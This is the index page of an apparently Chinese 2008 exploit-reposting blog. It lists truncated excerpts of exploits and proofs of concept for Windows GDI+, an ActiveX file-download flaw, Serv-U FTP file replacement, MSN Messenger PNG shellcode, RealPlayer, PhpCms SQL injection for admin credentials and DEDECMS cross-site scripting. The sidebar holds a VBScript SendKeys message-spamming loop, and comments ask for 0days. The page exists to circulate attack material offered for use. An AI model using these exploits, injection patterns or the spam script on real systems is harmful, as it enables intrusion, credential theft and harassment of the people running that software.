3xp-0day'Blog

3xp-0day
  • 2008-10-12

    MS Windows GDI+ Proof of Concept (MS08-052) #2 - [exp'or'0day]

    ------------------------------------------------------------------------------------------------------------ Operating System: XP SP2 Gdiplus.dll Version: 5.1.3102.2180 Credit: John Smith, Evil Fingers GIF Template Reference: http://www.swe...
    Tag:ms08052代码
    3exxp-0day 发表于08:45:16 | 阅读全文 | 评论 3 | 编辑 | 分享 0
  • 2008-10-12

    Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞 - [exp'or'0day]

    Microsoft Digital Image是一款图像管理处理工具。
    其包含的PicturePusher 'PipPPush.dll' ActiveX控件存在设计问题,远程攻击者可以利用漏洞从任意位置下载文件到受影响的电脑。
    控件允许构建定制的POST请求实现上传功能,使用浏览器作为代理可以回弹,并通过AddString()方法注入文件名子字段。类似的POST请求如下:
    POST /?aaaa=1 HTTP/1.1
    Content-Type: multipa...
    Tag:
    3exxp-0day 发表于08:44:15 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-10-05

    Serv-U 7.2.0.1 ftp file replacement - [exp'or'0day]

    #user must have upload permissions
    #
    #(x) dmnt 2008-10-01
    220 Serv-U FTP Server v7.2 ready...
    user test
    331 User name okay, need password.
    pass test
    230 User logged in, proceed.
    rnfr any_exist_file.ext
    350 F...
    Tag:serv-u7.2提权
    3exxp-0day 发表于06:12:00 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-10-05

    MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded - [exp'or'0day]

    /* * * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit * Bug discoveried by Core Security Technologies (www.coresecurity.com) * Exploit coded By ATmaCA * Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved. * Web: http:/...
    Tag:最新shellcode 最新漏洞。最新网马
    3exxp-0day 发表于06:09:07 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-10-05

    RealPlayer/Helix Player Remote Format String Exploit (linux) - [exp'or'0day]

    /*
      *****************************************************************************************************************
      $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
      ********...
    Tag:RealPlayer exp linux
    3exxp-0day 发表于06:07:37 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-10-03

    PhpCms2007 sp6 SQL injection 0day - [exp'or'0day]

    <? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------...
    Tag:PhpCms2007 SQL
    3exxp-0day 发表于20:00:58 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-09-28

    传说中微软最强的漏洞MS08052的利用代码 - [exp'or'0day]

    MS Windows GDI+ .ico Remote Division By Zero Application: GDIPLUS.DLL Web Site: http://www.microsoft.com/ Platform: Windows * Bug: Division By Zero Tested agains: XP SP3 fully patched Note: This have nothing to do with http://milw0rm....
    Tag:MS08052利用代码,MS08052
    3exxp-0day 发表于05:31:51 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-09-28

    Microsoft WordPad '.doc'文件远程拒绝服务漏洞 - [exp'or'0day]

    Microsoft WordPad是一款微软开发的写字板程序。
    Microsoft WordPad处理特殊构建的.doc文件存在问题,远程攻击者可以利用漏洞使应用程序崩溃。
    目前还不确定是否能以任意代码执行方式利用。 <* 参考 漏洞提供者
    securfrog*>SEBUG安全建议:
    目前没有解决方案提供:
    http://www.microsoft.com
    测试方法:
    以下程序(方法)可能带有攻击性,仅供安全研究与教学...
    Tag:
    3exxp-0day 发表于05:31:02 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-09-28

    DEDECMS跨站及爆绝对路径漏洞 - [exp'or'0day]

    泄露绝对路径漏洞
    member/company.php

    member/job.php

    然后是跨站,这个得YY一下:

    漏洞文件:include/jump.php

    以下是漏洞代码:
    <?php
    if(!empty($_GET['gurl'])){
    echo "<script>location=\"{$_GET['gurl']}\&quo...
    Tag:
    3exxp-0day 发表于05:28:55 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-09-20

    MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow - [exp'or'0day]

    09.10.2008
    =============================================================================

    <input language=JavaScript onclick=poc() type=button value="launch exploit">

    <OBJECT id="target" classid=&...
    Tag:Microsoft 0day
    3exxp-0day 发表于17:23:21 | 阅读全文 | 评论 0 | 编辑 | 分享 0
共16页 1 2 3 4 5 6 7 8 9 10 下一页 最后一页

个人资料

3exxp-0day

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.AppActivate " 自从上次看到你。
你就好象住在我心理里。怎么也忘不掉 "
for i=1 to 50 '
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
next

日历

搜索

文章分类

  • 爱国愤青[7]
  • exp'or'0day[151]
  • 网络工程[23]
  • 本人小记[34]
  • 原创歌词[4]
  • 原创[4]
  • 安全资讯[51]
  • 网络攻防[17]
  • shellcode[1]

Tag

  • Microsoft[10]
  • 0day[8]
  • 漏洞[3]
  • RealPlayer[3]
  • 免费[3]
More..

最新日志

  • MS Windows GDI+ Proof of Concept (MS08-052) #2
  • Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞
  • Serv-U 7.2.0.1 ftp file replacement
  • MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded
  • RealPlayer/Helix Player Remote Format String Exploit (linux)
  • QZone新版开始支持Firefox浏览器
  • VB100结果揭晓 金山毒霸三冠王
  • PhpCms2007 sp6 SQL injection 0day
  • ESET System Analyzer Tool
  • 传说中微软最强的漏洞MS08052的利用代码
全部日志>>

最新评论

  • XXOXX:这里的东西还不是别人公开之后 兰州转载来了。。。。...
  • 劉:我的公司電腦,不知道哪里被控制了,無法上QQ有哪位高手指...
  • CZ-SMARTONE:SB
  • SNK:你好朋友,我这边有点业务方面的事想和你谈谈。 具体的可...
  • 尤:【QQ 版本】Build 18.55.1250 【Q...
  • aladan:你好,想找你修改一下溢出程序, lifei1949@...
  • xiao3:弱弱的问一下:博主,你手里有诱人的0day吗?...
  • g-hack:友情链接 地址www.G-hack.com 名称:...
  • crab:汗~又看了下,自己错误,命令多了个空格~ ------...
  • crab:试了下,快捷方式,不支持哦! %windir%\sys...

链接

  • 3xp-0day
  • milw0rm
  • Cn-hack榜中榜
  • Max
  • 冷漠
  • sebug
  • --------文字链接--------
  • Taobao's shop
  • Lollipop's 暗香芳芷寒舍
  • 80sec
  • 黑冰's blog
  • 笨小子's Blog
  • 乐乐's Blog
  • 范特西's Blog
  • Mika's blog
  • 小雨's Blog
  • 血腥魔术师
  • Neeao's Blog
  • 心灵港湾 BLOG
  • P@sSw0rd's blog
  • salors
  • 大牙也许's Blog
  • Lollipop's 暗香芳芷寒舍

存档

  • 2008 [326]
  • 访问统计:
  • RSS 什么是RSS?
    用IM提醒我内容更新
    订阅到QQ邮箱
    订阅到鲜果阅读器
    订阅到Google阅读器
    订阅到抓虾阅读器
  • 《城客》第四期:创意之城
    博客大巴
    博客大巴使用指南
    博客大巴模板中心
    免费注册博客大巴
    一键博客搬家工具
    中文互动杂志城客
Copyright © 2002-2009 BlogBus.com, All Rights Reserved. 博客大巴 版权所有
博客大巴模板设计:那时花开 | 作者:bxguang